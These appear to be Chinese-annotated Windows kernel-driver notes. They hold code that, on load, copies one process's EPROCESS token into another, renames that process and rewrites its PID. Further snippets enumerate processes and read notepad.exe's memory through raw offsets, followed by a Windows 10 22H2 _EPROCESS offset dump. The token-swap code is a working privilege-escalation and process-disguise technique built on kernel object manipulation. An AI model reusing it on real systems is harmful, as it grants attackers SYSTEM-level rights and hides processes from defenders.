        *(PULONG_PTR)(targetBase + EPROCESS_TOKEN_OFFSET) = sourceToken;

        // 验证修改
        ULONG_PTR newTargetToken = *(PULONG_PTR)(targetBase + EPROCESS_TOKEN_OFFSET);
        DebugMessage("qi:New Target Process Token: 0x%llX", newTargetToken);

        if (sourceToken == newTargetToken) {
            DebugMessage("qi:Token successfully copied!");
        }
        else {
            DebugMessage("qi:Token copy failed!");
        }

        return STATUS_SUCCESS;
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        DebugMessage("qi:Exception occurred while copying token: 0x%X", GetExceptionCode());
        return STATUS_UNSUCCESSFUL;
    }
}

// 复制一个进程的名称到另一个进程
NTSTATUS CopyProcessName(PEPROCESS SourceProcess, PEPROCESS TargetProcess)
{
    PUCHAR sourceBase = (PUCHAR)SourceProcess;
    PUCHAR targetBase = (PUCHAR)TargetProcess;

    __try {
        // 读取源进程名称
        UCHAR sourceImageName[16] = { 0 };
        RtlCopyMemory(sourceImageName, sourceBase + EPROCESS_IMAGE_NAME_OFFSET, 15);
        DebugMessage("qi:Source Process Name: %s", sourceImageName);

        // 记录目标进程原始名称
        UCHAR originalTargetName[16] = { 0 };
        RtlCopyMemory(originalTargetName, targetBase + EPROCESS_IMAGE_NAME_OFFSET, 15);
        DebugMessage("qi:Original Target Process Name: %s", originalTargetName);

        // 复制进程名称
        RtlCopyMemory(targetBase + EPROCESS_IMAGE_NAME_OFFSET, sourceImageName, 15);

        // 验证修改
        UCHAR newTargetName[16] = { 0 };
        RtlCopyMemory(newTargetName, targetBase + EPROCESS_IMAGE_NAME_OFFSET, 15);
        DebugMessage("qi:New Target Process Name: %s", newTargetName);

        return STATUS_SUCCESS;
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        DebugMessage("qi:Exception occurred while copying process name: 0x%X", GetExceptionCode());
        return STATUS_UNSUCCESSFUL;
    }
}

// 尝试修改进程ID - 极其危险的操作，几乎肯定会导致系统崩溃
NTSTATUS ModifyProcessId(PEPROCESS Process, HANDLE NewPid)
{
    PUCHAR processBase = (PUCHAR)Process;

    __try {
        // 记录原始PID
        HANDLE oldPid = *(PHANDLE)(processBase + EPROCESS_PID_OFFSET);
        DebugMessage("qi:Original PID: %d (0x%X)", HandleToULong(oldPid), HandleToULong(oldPid));

        // 严重警告
        DebugMessage("qi:EXTREME DANGER: Attempting to modify PID to %d(PID_NEW)", PID_NEW);
        DebugMessage("qi:EXTREME DANGER: This will cause immediate system instability");
        DebugMessage("qi:EXTREME DANGER: System crash is virtually guaranteed");

        // 修改PID - 这是致命操作
        *(PHANDLE)(processBase + EPROCESS_PID_OFFSET) = NewPid;

        // 验证修改 - 系统可能在此之前已经崩溃
        HANDLE verifyPid = *(PHANDLE)(processBase + EPROCESS_PID_OFFSET);
        DebugMessage("qi:Attempted New PID: %d (0x%X)", HandleToULong(verifyPid), HandleToULong(verifyPid));

        return STATUS_SUCCESS;
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        DebugMessage("qi:Exception occurred while modifying PID: 0x%X", GetExceptionCode());
        return STATUS_UNSUCCESSFUL;
    }
}

// 尝试复制System进程的Token到目标进程，并修改目标进程ID为PID_NEW
VOID TrySystemImpersonation()
{
    PEPROCESS sourceProcess = NULL;
    PEPROCESS targetProcess = NULL;
    NTSTATUS status;

    // 查找PID为PID_NEW的进程
    status = PsLookupProcessByProcessId((HANDLE)PID_NEW, &sourceProcess);
    if (!NT_SUCCESS(status))
    {
        DebugMessage("qi:Failed to find NEW process (PID %d), status: 0x%X", PID_NEW, status);
        return;
    }

    // 查找目标进程
    status = PsLookupProcessByProcessId((HANDLE)PID_OLD, &targetProcess);
    if (!NT_SUCCESS(status))
    {
        DebugMessage("qi:Failed to find target process with PID 0x%X, status: 0x%X", PID_OLD, status);
        ObDereferenceObject(sourceProcess);
        return;
    }

    // 打印初始信息
    DebugMessage("qi:Source process info:");
    PrintProcessInfo(sourceProcess);

    DebugMessage("qi:Target process info:");
    PrintProcessInfo(targetProcess);

    // 步骤1: 复制进程名称
    DebugMessage("qi:Step 1: Attempting to copy process name...");
    status = CopyProcessName(sourceProcess, targetProcess);
    if (!NT_SUCCESS(status)) {
        DebugMessage("qi:Process name copy failed with status: 0x%X", status);
        ObDereferenceObject(sourceProcess);
        ObDereferenceObject(targetProcess);
        return;
    }

    // 步骤2: 复制Token
    DebugMessage("qi:Step 2: Attempting to copy token...");
    status = CopyProcessToken(sourceProcess, targetProcess);

    if (NT_SUCCESS(status)) {
        DebugMessage("qi:Token copy operation completed. Target process info after modifications:");
        PrintProcessInfo(targetProcess);

        // 步骤3: 修改进程ID - 极其危险
        DebugMessage("qi:Step 3: Attempting to modify target process ID to %d - EXTREMELY DANGEROUS", PID_NEW);
        DebugMessage("qi:This will likely cause an immediate system crash");

        status = ModifyProcessId(targetProcess, (HANDLE)PID_NEW);

        if (NT_SUCCESS(status)) {
            DebugMessage("qi:Process ID modification attempt completed - If you're seeing this message, it's surprising");
            PrintProcessInfo(targetProcess);
        }
        else {
            DebugMessage("qi:Process ID modification failed with status: 0x%X", status);
        }
    }
    else {
        DebugMessage("qi:Token copy operation failed with status: 0x%X", status);
    }

    // 释放进程对象引用
    ObDereferenceObject(sourceProcess);
    ObDereferenceObject(targetProcess);
}

// 驱动入口函数
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath)
{
    DebugMessage("qi:Driver Entry!");
    pDriverObject->DriverUnload = UnloadDriver;

    // 尝试提升进程权限并修改PID
    TrySystemImpersonation();

    return STATUS_SUCCESS;
}

1从eprocess中打印

#include <ntifs.h>

VOID DriverUnload(PDRIVER_OBJECT pDriverObject)
{
	DbgPrintEx(0,0,L"Unload Success!!");
}

NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegPath)
{
	pDriverObject->DriverUnload = DriverUnload;
	PEPROCESS pEprocess = NULL;
	PEPROCESS pFirstEprocess = NULL;
	ULONG64 uIProcessName = 0;
	ULONG64 uIProcessID = 0;

	pEprocess = PsGetCurrentProcess();
	if (pEprocess == 0)
	{
		DbgPrintEx(0,0,"PsGetCurrentProcess Failed!");
		return STATUS_SUCCESS;
	}
	pFirstEprocess = pEprocess;
	while (pEprocess != NULL)
	{
		//List = 0x448
		//Name = 0x5a8
		//Id = 0x440
		uIProcessName = (ULONG64)pEprocess + 0x5a8;
		uIProcessID = *(LONG64*)((ULONG64)pEprocess + 0x440);
		DbgPrintEx(0,0,"Process Name = %s | Process ID = %d\n", uIProcessName, uIProcessID);
		pEprocess = (ULONG64)(*(ULONG64*)((ULONG64)pEprocess + 0x448) - 0x448);
		
		if (pEprocess == pFirstEprocess || uIProcessID <= 0)
		{
			break;
		}
	}
	DbgPrintEx(0,0,"Driver Load Success!");
	return STATUS_SUCCESS;
}

根据进程名找到eprocess后读取进程虚拟内存数据

#include <ntifs.h>
#include <stdio.h>

#pragma warning (disable : 4100)
#define DebugMessage(x, ...) DbgPrintEx(0, 0, x, __VA_ARGS__);

// 函数声明
NTSTATUS ReadSystemVirtualMemory(PVOID virtualAddr, PVOID buffer, SIZE_T size);
NTSTATUS ReadProcessMemory(PEPROCESS Process, PVOID userAddr, PVOID buffer, SIZE_T size);
void PrintBuffer(PVOID buffer, SIZE_T size);

NTSTATUS UnloadDriver(PDRIVER_OBJECT pDriverObject)
{
    DebugMessage("unload pDriverObject addr is %p\n", pDriverObject);
    return STATUS_SUCCESS;
}

NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath)
{
    UCHAR buffer[64] = { 0 };
    NTSTATUS status;

    pDriverObject->DriverUnload = UnloadDriver;
    DebugMessage("Into DriverEntry %p\n", pDriverObject);
    DebugMessage("pDriverObject address is %p\n", pDriverObject);
    DebugMessage("pRegistryPath is %wZ\n", pRegistryPath);

    // 要读取的系统虚拟地址
    PVOID systemVirtualAddr = (PVOID)0xFFFFB68807741D30;

    // 调用独立函数读取系统虚拟内存
    status = ReadSystemVirtualMemory(systemVirtualAddr, buffer, sizeof(buffer));

    if (NT_SUCCESS(status)) {
        DebugMessage("Successfully read system virtual memory\n");
    }
    else {
        DebugMessage("Failed to read system virtual memory, status: 0x%X\n", status);
    }

    // 读取进程内存示例
    // 1. 查找目标进程 (以notepad.exe为例)
    UNICODE_STRING targetProcessName;
    RtlInitUnicodeString(&targetProcessName, L"notepad.exe");
    
    PEPROCESS targetProcess = NULL;
    ULONG pid = 0;
    
    // 查找进程PID
    for (pid = 4; pid < 100000; pid += 4) {
        status = PsLookupProcessByProcessId((HANDLE)pid, &targetProcess);
        if (NT_SUCCESS(status)) {
            // 检查是否是目标进程
            PUNICODE_STRING processName = NULL;
            
            // 获取进程名
            PUCHAR procNamePtr = (PUCHAR)targetProcess + 0x5A8; // Windows 11 中EPROCESS结构的ImageFileName偏移，可能需要根据系统版本调整
            char imageName[16] = {0};
            RtlCopyMemory(imageName, procNamePtr, 15);
            
            if (_stricmp(imageName, "notepad.exe") == 0) {
                DebugMessage("Found notepad.exe process, PID: %d\n", pid);
                
                // 读取进程内存 (地址0x00007FF7FE3C0000是示例地址，需要替换为实际地址)
                PVOID userVirtualAddr = (PVOID)0x00007FF7FE3C0000;
                RtlZeroMemory(buffer, sizeof(buffer));
                
                status = ReadProcessMemory(targetProcess, userVirtualAddr, buffer, sizeof(buffer));
                
                if (NT_SUCCESS(status)) {
                    DebugMessage("Successfully read process memory\n");
                    PrintBuffer(buffer, sizeof(buffer));
                }
                else {
                    DebugMessage("Failed to read process memory, status: 0x%X\n", status);
                }
                
                // 记得解除进程对象引用
                ObDereferenceObject(targetProcess);
                break;
            }
            
            // 不是目标进程，解除引用
            ObDereferenceObject(targetProcess);
        }
    }

    if (pid >= 100000) {
        DebugMessage("Could not find notepad.exe process\n");
    }

    return STATUS_SUCCESS;
}

// 读取系统虚拟内存数据的独立函数
NTSTATUS ReadSystemVirtualMemory(PVOID virtualAddr, PVOID buffer, SIZE_T size)
{
    NTSTATUS status = STATUS_SUCCESS;

    // 使用try-except块保护内存访问
    __try {
        // 直接通过指针读取数据到缓冲区
        RtlCopyMemory(buffer, virtualAddr, size);
        DebugMessage("System virtual memory at 0x%p:", virtualAddr);
        PrintBuffer(buffer, size);
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        status = GetExceptionCode();
        DebugMessage("Exception occurred while accessing memory: 0x%X\n", status);
    }
    return status;
}

// 读取进程虚拟内存的函数
NTSTATUS ReadProcessMemory(PEPROCESS Process, PVOID userAddr, PVOID buffer, SIZE_T size)
{
    NTSTATUS status = STATUS_SUCCESS;
    KAPC_STATE apcState;
    
    // 附加到目标进程
    KeStackAttachProcess(Process, &apcState);
    
    // 尝试读取内存
    __try {
        // 检查地址的有效性
        if (MmIsAddressValid(userAddr)) {
            ProbeForRead(userAddr, size, 1);
            RtlCopyMemory(buffer, userAddr, size);
            DebugMessage("Process virtual memory at 0x%p:", userAddr);
        }
        else {
            status = STATUS_INVALID_ADDRESS;
            DebugMessage("Invalid address: 0x%p\n", userAddr);
        }
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        status = GetExceptionCode();
        DebugMessage("Exception occurred while accessing process memory: 0x%X\n", status);
    }
    
    // 分离进程
    KeUnstackDetachProcess(&apcState);
    
    return status;
}

void PrintBuffer(PVOID buffer, SIZE_T size)
{
    PUCHAR byteBuffer = (PUCHAR)buffer;

    char lineBuf[100];
    int linePos = 0;

    for (SIZE_T i = 0; i < size; i++) {
        if (i % 16 == 0) {
            if (i > 0) {
                DebugMessage("%s", lineBuf);
            }
            linePos = 0;
            linePos += sprintf_s(lineBuf, sizeof(lineBuf), "%04X: ", (UINT32)i);
        }
        linePos += sprintf_s(lineBuf + linePos, sizeof(lineBuf) - linePos, "%02X ", byteBuffer[i]);
    }
    if (linePos > 0) {
        DebugMessage("%s", lineBuf);
    }
}

不同系統EPROCESS偏移查询网站

windows10 22h2 Eprocess结构体偏移

0: kd> dt nt!_EPROCESS
   +0x000 Pcb              : _KPROCESS
   +0x438 ProcessLock      : _EX_PUSH_LOCK
   +0x440 UniqueProcessId  : Ptr64 Void
   +0x448 ActiveProcessLinks : _LIST_ENTRY
   +0x458 RundownProtect   : _EX_RUNDOWN_REF
   +0x460 Flags2           : Uint4B
   +0x460 JobNotReallyActive : Pos 0, 1 Bit
   +0x460 AccountingFolded : Pos 1, 1 Bit
   +0x460 NewProcessReported : Pos 2, 1 Bit
   +0x460 ExitProcessReported : Pos 3, 1 Bit
   +0x460 ReportCommitChanges : Pos 4, 1 Bit
   +0x460 LastReportMemory : Pos 5, 1 Bit
   +0x460 ForceWakeCharge  : Pos 6, 1 Bit
   +0x460 CrossSessionCreate : Pos 7, 1 Bit
   +0x460 NeedsHandleRundown : Pos 8, 1 Bit
   +0x460 RefTraceEnabled  : Pos 9, 1 Bit
   +0x460 PicoCreated      : Pos 10, 1 Bit
   +0x460 EmptyJobEvaluated : Pos 11, 1 Bit
   +0x460 DefaultPagePriority : Pos 12, 3 Bits
   +0x460 PrimaryTokenFrozen : Pos 15, 1 Bit
   +0x460 ProcessVerifierTarget : Pos 16, 1 Bit
   +0x460 RestrictSetThreadContext : Pos 17, 1 Bit
   +0x460 AffinityPermanent : Pos 18, 1 Bit
   +0x460 AffinityUpdateEnable : Pos 19, 1 Bit
   +0x460 PropagateNode    : Pos 20, 1 Bit
   +0x460 ExplicitAffinity : Pos 21, 1 Bit
   +0x460 ProcessExecutionState : Pos 22, 2 Bits
   +0x460 EnableReadVmLogging : Pos 24, 1 Bit
   +0x460 EnableWriteVmLogging : Pos 25, 1 Bit
   +0x460 FatalAccessTerminationRequested : Pos 26, 1 Bit
   +0x460 DisableSystemAllowedCpuSet : Pos 27, 1 Bit
   +0x460 ProcessStateChangeRequest : Pos 28, 2 Bits
   +0x460 ProcessStateChangeInProgress : Pos 30, 1 Bit
   +0x460 InPrivate        : Pos 31, 1 Bit
   +0x464 Flags            : Uint4B
   +0x464 CreateReported   : Pos 0, 1 Bit
   +0x464 NoDebugInherit   : Pos 1, 1 Bit
   +0x464 ProcessExiting   : Pos 2, 1 Bit
   +0x464 ProcessDelete    : Pos 3, 1 Bit
   +0x464 ManageExecutableMemoryWrites : Pos 4, 1 Bit
   +0x464 VmDeleted        : Pos 5, 1 Bit
   +0x464 OutswapEnabled   : Pos 6, 1 Bit
   +0x464 Outswapped       : Pos 7, 1 Bit
   +0x464 FailFastOnCommitFail : Pos 8, 1 Bit
   +0x464 Wow64VaSpace4Gb  : Pos 9, 1 Bit
   +0x464 AddressSpaceInitialized : Pos 10, 2 Bits
   +0x464 SetTimerResolution : Pos 12, 1 Bit
   +0x464 BreakOnTermination : Pos 13, 1 Bit
   +0x464 DeprioritizeViews : Pos 14, 1 Bit
   +0x464 WriteWatch       : Pos 15, 1 Bit
   +0x464 ProcessInSession : Pos 16, 1 Bit
   +0x464 OverrideAddressSpace : Pos 17, 1 Bit
   +0x464 HasAddressSpace  : Pos 18, 1 Bit
   +0x464 LaunchPrefetched : Pos 19, 1 Bit
   +0x464 Background       : Pos 20, 1 Bit
   +0x464 VmTopDown        : Pos 21, 1 Bit
   +0x464 ImageNotifyDone  : Pos 22, 1 Bit
   +0x464 PdeUpdateNeeded  : Pos 23, 1 Bit
   +0x464 VdmAllowed       : Pos 24, 1 Bit
   +0x464 ProcessRundown   : Pos 25, 1 Bit
   +0x464 ProcessInserted  : Pos 26, 1 Bit
   +0x464 DefaultIoPriority : Pos 27, 3 Bits
   +0x464 ProcessSelfDelete : Pos 30, 1 Bit
   +0x464 SetTimerResolutionLink : Pos 31, 1 Bit
   +0x468 CreateTime       : _LARGE_INTEGER
   +0x470 ProcessQuotaUsage : [2] Uint8B
   +0x480 ProcessQuotaPeak : [2] Uint8B
   +0x490 PeakVirtualSize  : Uint8B
   +0x498 VirtualSize      : Uint8B
   +0x4a0 SessionProcessLinks : _LIST_ENTRY
   +0x4b0 ExceptionPortData : Ptr64 Void
   +0x4b0 ExceptionPortValue : Uint8B
   +0x4b0 ExceptionPortState : Pos 0, 3 Bits
   +0x4b8 Token            : _EX_FAST_REF
   +0x4c0 MmReserved       : Uint8B
   +0x4c8 AddressCreationLock : _EX_PUSH_LOCK
   +0x4d0 PageTableCommitmentLock : _EX_PUSH_LOCK
   +0x4d8 RotateInProgress : Ptr64 _ETHREAD
   +0x4e0 ForkInProgress   : Ptr64 _ETHREAD
   +0x4e8 CommitChargeJob  : Ptr64 _EJOB
   +0x4f0 CloneRoot        : _RTL_AVL_TREE
   +0x4f8 NumberOfPrivatePages : Uint8B
   +0x500 NumberOfLockedPages : Uint8B
   +0x508 Win32Process     : Ptr64 Void
   +0x510 Job              : Ptr64 _EJOB
   +0x518 SectionObject    : Ptr64 Void
   +0x520 SectionBaseAddress : Ptr64 Void
   +0x528 Cookie           : Uint4B
   +0x530 WorkingSetWatch  : Ptr64 _PAGEFAULT_HISTORY
   +0x538 Win32WindowStation : Ptr64 Void
   +0x540 InheritedFromUniqueProcessId : Ptr64 Void
   +0x548 OwnerProcessId   : Uint8B
   +0x550 Peb              : Ptr64 _PEB
   +0x558 Session          : Ptr64 _MM_SESSION_SPACE
   +0x560 Spare1           : Ptr64 Void
   +0x568 QuotaBlock       : Ptr64 _EPROCESS_QUOTA_BLOCK
   +0x570 ObjectTable      : Ptr64 _HANDLE_TABLE
   +0x578 DebugPort        : Ptr64 Void
   +0x580 WoW64Process     : Ptr64 _EWOW64PROCESS
   +0x588 DeviceMap        : Ptr64 Void
   +0x590 EtwDataSource    : Ptr64 Void
   +0x598 PageDirectoryPte : Uint8B
   +0x5a0 ImageFilePointer : Ptr64 _FILE_OBJECT
   +0x5a8 ImageFileName    : [15] UChar
   +0x5b7 PriorityClass    : UChar
   +0x5b8 SecurityPort     : Ptr64 Void
   +0x5c0 SeAuditProcessCreationInfo : _SE_AUDIT_PROCESS_CREATION_INFO
   +0x5c8 JobLinks         : _LIST_ENTRY
   +0x5d8 HighestUserAddress : Ptr64 Void
   +0x5e0 ThreadListHead   : _LIST_ENTRY
   +0x5f0 ActiveThreads    : Uint4B
   +0x5f4 ImagePathHash    : Uint4B
   +0x5f8 DefaultHardErrorProcessing : Uint4B
   +0x5fc LastThreadExitStatus : Int4B
   +0x600 PrefetchTrace    : _EX_FAST_REF
   +0x608 LockedPagesList  : Ptr64 Void
   +0x610 ReadOperationCount : _LARGE_INTEGER
   +0x618 WriteOperationCount : _LARGE_INTEGER
   +0x620 OtherOperationCount : _LARGE_INTEGER
   +0x628 ReadTransferCount : _LARGE_INTEGER
   +0x630 WriteTransferCount : _LARGE_INTEGER
   +0x638 OtherTransferCount : _LARGE_INTEGER
   +0x640 CommitChargeLimit : Uint8B
   +0x648 CommitCharge     : Uint8B
   +0x650 CommitChargePeak : Uint8B
   +0x680 Vm               : _MMSUPPORT_FULL
   +0x7c0 MmProcessLinks   : _LIST_ENTRY
   +0x7d0 ModifiedPageCount : Uint4B
   +0x7d4 ExitStatus       : Int4B
   +0x7d8 VadRoot          : _RTL_AVL_TREE
   +0x7e0 VadHint          : Ptr64 Void
   +0x7e8 VadCount         : Uint8B
   +0x7f0 VadPhysicalPages : Uint8B
   +0x7f8 VadPhysicalPagesLimit : Uint8B
   +0x800 AlpcContext      : _ALPC_PROCESS_CONTEXT
   +0x820 TimerResolutionLink : _LIST_ENTRY
   +0x830 TimerResolutionStackRecord : Ptr64 _PO_DIAG_STACK_RECORD
   +0x838 RequestedTimerResolution : Uint4B
   +0x83c SmallestTimerResolution : Uint4B
   +0x840 ExitTime         : _LARGE_INTEGER
   +0x848 InvertedFunctionTable : Ptr64 _INVERTED_FUNCTION_TABLE
   +0x850 InvertedFunctionTableLock : _EX_PUSH_LOCK
   +0x858 ActiveThreadsHighWatermark : Uint4B
   +0x85c LargePrivateVadCount : Uint4B
   +0x860 ThreadListLock   : _EX_PUSH_LOCK
   +0x868 WnfContext       : Ptr64 Void
   +0x870 ServerSilo       : Ptr64 _EJOB
   +0x878 SignatureLevel   : UChar
   +0x879 SectionSignatureLevel : UChar
   +0x87a Protection       : _PS_PROTECTION
   +0x87b HangCount        : Pos 0, 3 Bits
   +0x87b GhostCount       : Pos 3, 3 Bits
   +0x87b PrefilterException : Pos 6, 1 Bit
   +0x87c Flags3           : Uint4B
   +0x87c Minimal          : Pos 0, 1 Bit
   +0x87c ReplacingPageRoot : Pos 1, 1 Bit
   +0x87c Crashed          : Pos 2, 1 Bit
   +0x87c JobVadsAreTracked : Pos 3, 1 Bit
   +0x87c VadTrackingDisabled : Pos 4, 1 Bit
   +0x87c AuxiliaryProcess : Pos 5, 1 Bit
   +0x87c SubsystemProcess : Pos 6, 1 Bit
   +0x87c IndirectCpuSets  : Pos 7, 1 Bit
   +0x87c RelinquishedCommit : Pos 8, 1 Bit
   +0x87c HighGraphicsPriority : Pos 9, 1 Bit
   +0x87c CommitFailLogged : Pos 10, 1 Bit
   +0x87c ReserveFailLogged : Pos 11, 1 Bit
   +0x87c SystemProcess    : Pos 12, 1 Bit
   +0x87c HideImageBaseAddresses : Pos 13, 1 Bit
   +0x87c AddressPolicyFrozen : Pos 14, 1 Bit
   +0x87c ProcessFirstResume : Pos 15, 1 Bit
   +0x87c ForegroundExternal : Pos 16, 1 Bit
   +0x87c ForegroundSystem : Pos 17, 1 Bit
   +0x87c HighMemoryPriority : Pos 18, 1 Bit
   +0x87c EnableProcessSuspendResumeLogging : Pos 19, 1 Bit
   +0x87c EnableThreadSuspendResumeLogging : Pos 20, 1 Bit
   +0x87c SecurityDomainChanged : Pos 21, 1 Bit
   +0x87c SecurityFreezeComplete : Pos 22, 1 Bit
   +0x87c VmProcessorHost  : Pos 23, 1 Bit
   +0x87c VmProcessorHostTransition : Pos 24, 1 Bit
   +0x87c AltSyscall       : Pos 25, 1 Bit
   +0x87c TimerResolutionIgnore : Pos 26, 1 Bit
   +0x87c DisallowUserTerminate : Pos 27, 1 Bit
   +0x880 DeviceAsid       : Int4B
   +0x888 SvmData          : Ptr64 Void
   +0x890 SvmProcessLock   : _EX_PUSH_LOCK
   +0x898 SvmLock          : Uint8B
   +0x8a0 SvmProcessDeviceListHead : _LIST_ENTRY
   +0x8b0 LastFreezeInterruptTime : Uint8B
   +0x8b8 DiskCounters     : Ptr64 _PROCESS_DISK_COUNTERS
   +0x8c0 PicoContext      : Ptr64 Void
   +0x8c8 EnclaveTable     : Ptr64 Void
   +0x8d0 EnclaveNumber    : Uint8B
   +0x8d8 EnclaveLock      : _EX_PUSH_LOCK
   +0x8e0 HighPriorityFaultsAllowed : Uint4B
   +0x8e8 EnergyContext    : Ptr64 _PO_PROCESS_ENERGY_CONTEXT
   +0x8f0 VmContext        : Ptr64 Void
   +0x8f8 SequenceNumber   : Uint8B
   +0x900 CreateInterruptTime : Uint8B
   +0x908 CreateUnbiasedInterruptTime : Uint8B
   +0x910 TotalUnbiasedFrozenTime : Uint8B
   +0x918 LastAppStateUpdateTime : Uint8B
   +0x920 LastAppStateUptime : Pos 0, 61 Bits
   +0x920 LastAppState     : Pos 61, 3 Bits
   +0x928 SharedCommitCharge : Uint8B
   +0x930 SharedCommitLock : _EX_PUSH_LOCK
   +0x938 SharedCommitLinks : _LIST_ENTRY
   +0x948 AllowedCpuSets   : Uint8B
   +0x950 DefaultCpuSets   : Uint8B
   +0x948 AllowedCpuSetsIndirect : Ptr64 Uint8B
   +0x950 DefaultCpuSetsIndirect : Ptr64 Uint8B
   +0x958 DiskIoAttribution : Ptr64 Void
   +0x960 DxgProcess       : Ptr64 Void
   +0x968 Win32KFilterSet  : Uint4B
   +0x970 ProcessTimerDelay : _PS_INTERLOCKED_TIMER_DELAY_VALUES
   +0x978 KTimerSets       : Uint4B
   +0x97c KTimer2Sets      : Uint4B
   +0x980 ThreadTimerSets  : Uint4B
   +0x988 VirtualTimerListLock : Uint8B
   +0x990 VirtualTimerListHead : _LIST_ENTRY
   +0x9a0 WakeChannel      : _WNF_STATE_NAME
   +0x9a0 WakeInfo         : _PS_PROCESS_WAKE_INFORMATION
   +0x9d0 MitigationFlags  : Uint4B
   +0x9d0 MitigationFlagsValues : <anonymous-tag>
   +0x9d4 MitigationFlags2 : Uint4B
   +0x9d4 MitigationFlags2Values : <anonymous-tag>
   +0x9d8 PartitionObject  : Ptr64 Void
   +0x9e0 SecurityDomain   : Uint8B
   +0x9e8 ParentSecurityDomain : Uint8B
   +0x9f0 CoverageSamplerContext : Ptr64 Void
   +0x9f8 MmHotPatchContext : Ptr64 Void
   +0xa00 DynamicEHContinuationTargetsTree : _RTL_AVL_TREE
   +0xa08 DynamicEHContinuationTargetsLock : _EX_PUSH_LOCK
   +0xa10 DynamicEnforcedCetCompatibleRanges : _PS_DYNAMIC_ENFORCED_ADDRESS_RANGES
   +0xa20 DisabledComponentFlags : Uint4B
   +0xa28 PathRedirectionHashes : Ptr64 Uint4B